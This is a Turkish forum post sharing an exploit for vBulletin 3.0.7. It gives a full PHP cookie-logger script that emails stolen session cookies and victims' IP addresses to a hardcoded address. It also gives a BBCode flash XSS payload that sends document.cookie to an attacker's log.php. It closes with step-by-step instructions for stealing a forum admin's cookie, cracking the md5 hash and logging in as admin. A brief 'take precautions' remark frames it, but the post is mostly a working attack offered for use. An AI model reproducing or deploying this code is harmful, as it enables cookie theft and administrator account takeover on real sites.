Aradığınız içerik sitemizde mevcut durumdadır
buradan sitemize dönebilirsiniz !
Forum Başlıklarına gitmek için tıklayınız
Vbulletin 3.0.7 exploit [cookies]
aşağıdaki kodlar mailime gelen kodlardır. doğruluğu hakkında bir fikrim yok
çünkü php ile ilgili en ufak bir bilgiye sahip değilim eğer verilen kodlar doğruysa arkadaşlar önlemlerini ona göre alsınlar.
Kod:
<?php
/* S4aLog v1.0 [ Beta ]
-----------------------
**Beta Of S4aLog v1.0 With Str_Repalce <;>
! You Can Get Cookies And Refresh The Broweser ! v0.10
[ New New New ]
!Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.c...ack1&id=Cookies
[ MSG ]
Name : Attack1
Cookies : Cookies
Refresh : http://www.s4a.xx
[ MSG ]!
!
Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;
!
[ New New New ]
*/
$YourMail = "sonsuz_Hayat@hotmail.com"; // Your E-mail
/*-----------------------*/
$Ip = $REMOTE_ADDR;
$Cooki_e = $_GET[’id’];
$NameOfAttack = $_GET[’nm’];
$Refresh = $_GET[’re’];
/* Start */
$ReplaceCookie1 = array("=",";");
$ReplaceCookie2 = array("[ "," ] ");
$Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki &nbs p; _e); // Replace
/* e.x hash=0210; | hash[0210]*/
//***************************************//
$Hdr = "From: S4aLog <log-v1@s4a.cc>";
$Msg =
"
Mr Attacker ,,, S4aLog v1 Beta <<
[ ".$NameOfAttack." ] ,, Name Of Attack
[ ".$Refresh." ] ,, Refresh Page
[ ".$Ip." ] ,, Ip
[ S4aLog < By FoRdET-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ]
[ Sonsuz_hayat@hotmail.com - Sonsuz_hayat@hotmail.com ]
-----------------------------------------------
Cookie ::
".$Cooki_e."
";
/* ------------------------------------------------------------ ------------- */
$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);
/************************************************** &nb sp; ***************************/
if($Send){
if($Refresh <> ""){header("location:".$Refresh);}
}
?>
buda foruma mesaj yazarken ekleyeceginiz kod:
Kod:
[flash=http://www.site.com/flash.swf]onfiltered=’location.href= "http://www.site.com/log.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document.Cookie’[/flash]#
Simdi bu exploit nasil calisiyor diyorsaniz bu foruma mesaj yazarken üstte yazdigim kodu foruma ekliyorsunuz bir flash olarak sonra site.com/log.php olan yeri kendi sitenize göre degistiriyorsunz log.php sizin cookie toplayiciniz oluyor üstte cookie toplayicinin kodunu verdim forum admini yazdiginiz mesaji acip bakarsa onun cookiesi sizin cookie toplayicisi olan topla.php geliyor ve sizde md5 kirip siteye admin olarak girebiliyorsunuz yada cookiesi ile iste bu kadar.
Hosting Sponsorumuz - Noktahost internet hizmetleri